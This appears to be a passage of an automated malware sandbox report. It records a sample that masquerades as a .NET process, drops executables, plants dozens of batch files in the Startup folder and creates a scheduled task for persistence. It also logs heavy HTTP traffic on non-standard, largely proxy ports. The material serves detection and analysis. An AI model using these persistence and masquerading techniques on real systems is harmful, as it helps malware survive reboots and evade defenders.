                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeFile created: C:\Users\user\AppData\Local\Temp\nsh1C9B.tmp\INetC.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops script or batch files to the startup folder
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CtKTLlY2LhR3aGX0PpowiHev.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\asxkwIl5OZIGfxZm6YYVmkyp.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cizDnjn04HXlR48gG87ono06.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5MU2eoXrXWjMqtCDgcUdxEXh.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cXcTyLUx7TcAqwa1PaqAe42l.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bKbfQedsHp5fPnIwSbgAXTGS.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mIfCnFQFL1iakCTbZHUvqqRQ.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FYS7ZbtfMHg45nrX4x6uzB9u.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RhOTMLiWYdQ5cM559FjqYdxz.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NWqXzpae1NGiof3fGaSCKwbn.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cPDXi3YsHb2JKplcNt2ulL4v.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\11FhgNaI9OC9CIBuozAEgUpl.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F4MKwilBLbDn1AvI4NJYim3J.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cgfjpHdWrKt7RBbVJLVt3KrQ.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Qeq8y82NFzxmb0C1zqsQ9GIJ.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PSzSTrBAfql6s2xHwMaulb6g.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RVMSz0xyVTk828VJXeNNyJ5X.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OUfj0Cjc8tUmuX1EJn2UDMRq.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iFau6s6nP0Npku3mzBCNvuor.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xEGgxKMHj9iJfbRcoMlSL4NY.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I0bhPTX30r8P4G1lvu8sFzoW.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MGSlOhBcAWKEdyehvoNbVoUR.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kiXcuJUJS97MOwYXLopyQBva.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hx6FJnbZibFTuzR4KP9Slo6z.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C7JK1QLd1HhpC2iu6FzaXx9e.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7lSYLKWCafZpx18kXQ49864p.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tP1HwHnBrmkAp5HYbvKx3soV.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V1FiUldszCzLAulbMss25ZN5.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\26fF1twXUUy7jGhqLx9vrwoW.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EQSWALPGSJbmdhZ5UXJP52TV.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6gL1gG7ldW7PoVRDY8vKo5tc.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7brphmKFPcG9dvFk5ljwDtYq.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5wXkSqn4DIUtGScxeGbdZDl0.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5MU2eoXrXWjMqtCDgcUdxEXh.bat
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeFile created: C:\Windows\Tasks\88e931437f4fbe2c.job
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5MU2eoXrXWjMqtCDgcUdxEXh.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mIfCnFQFL1iakCTbZHUvqqRQ.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FYS7ZbtfMHg45nrX4x6uzB9u.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RhOTMLiWYdQ5cM559FjqYdxz.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NWqXzpae1NGiof3fGaSCKwbn.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cPDXi3YsHb2JKplcNt2ulL4v.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\11FhgNaI9OC9CIBuozAEgUpl.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F4MKwilBLbDn1AvI4NJYim3J.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cgfjpHdWrKt7RBbVJLVt3KrQ.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Qeq8y82NFzxmb0C1zqsQ9GIJ.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PSzSTrBAfql6s2xHwMaulb6g.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RVMSz0xyVTk828VJXeNNyJ5X.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OUfj0Cjc8tUmuX1EJn2UDMRq.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iFau6s6nP0Npku3mzBCNvuor.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xEGgxKMHj9iJfbRcoMlSL4NY.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I0bhPTX30r8P4G1lvu8sFzoW.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MGSlOhBcAWKEdyehvoNbVoUR.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kiXcuJUJS97MOwYXLopyQBva.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hx6FJnbZibFTuzR4KP9Slo6z.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C7JK1QLd1HhpC2iu6FzaXx9e.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7lSYLKWCafZpx18kXQ49864p.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tP1HwHnBrmkAp5HYbvKx3soV.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V1FiUldszCzLAulbMss25ZN5.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\26fF1twXUUy7jGhqLx9vrwoW.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EQSWALPGSJbmdhZ5UXJP52TV.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6gL1gG7ldW7PoVRDY8vKo5tc.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7brphmKFPcG9dvFk5ljwDtYq.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5wXkSqn4DIUtGScxeGbdZDl0.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CtKTLlY2LhR3aGX0PpowiHev.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\asxkwIl5OZIGfxZm6YYVmkyp.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cizDnjn04HXlR48gG87ono06.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cXcTyLUx7TcAqwa1PaqAe42l.bat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bKbfQedsHp5fPnIwSbgAXTGS.bat
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 10647
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 8118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 12457
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 26927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 5088
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 64579
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 10647
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 22538
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8118 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 8123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 51513
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 9001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 7732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 41890
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 8989
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 41274
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 9080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 27294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 12457
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 26431
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 13412
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 49202
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 49889
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 26927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 55806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 1981
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 49905
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 2324
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50238 -> 28040
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9001 -> 49974
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 10647
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 58630
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 22538
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41890 -> 50039
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50283 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8989 -> 50011
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50277 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50312 -> 60651
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 36366
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 52127
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50102
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 26431 -> 50070
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50066
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50048
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50334 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 24015
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50360 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50251 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50380 -> 5050
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50281 -> 21605
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50397 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 52929
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50037
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50144
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 57752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50307 -> 3129
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 64109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50442 -> 5432
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50430 -> 59727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50359 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 11251
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50443 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 7732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50388 -> 1082
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2324 -> 50116
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 35081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 41274
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 49943
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50345 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50392 -> 9229
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50461 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50413 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50431 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50445 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50404 -> 9001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50456 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50441 -> 57327
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50435 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50460 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 16487
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50506 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50405 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50572 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50537 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 7518
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 54570
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50248 -> 8899
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 27294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 12457
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 8082
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 1983
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50493 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1081 -> 50266
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 50442
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50500 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50494 -> 6009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 15294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50524 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50651 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50489 -> 8880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 30464
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50597 -> 8081
